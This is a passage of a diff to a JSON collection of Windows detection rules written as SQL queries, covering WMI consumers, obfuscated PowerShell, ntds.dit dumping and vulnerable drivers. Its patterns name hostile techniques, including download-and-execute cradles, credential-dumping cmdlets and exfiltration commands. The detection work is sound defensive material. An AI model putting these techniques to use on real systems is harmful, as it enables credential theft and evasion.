'%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\'))" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", - "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" - ], - "filename": "win_system_hack_smbexec.yml" - }, - { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" - ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" - }, - { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", - "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" - ], - "filename": "win_system_apt_oilrig_mar18.yml" - }, - { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" + "attack.t1546.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Exclude legitimate (vetted) use of WMI event subscription in your network" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "status": "experimental", - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of the tool" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", - "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", - "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "status": "experimental", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", @@ -4177,1440 +3981,1493 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", - "status": "test", - "description": "Detects backup catalog deletions", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", - "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE 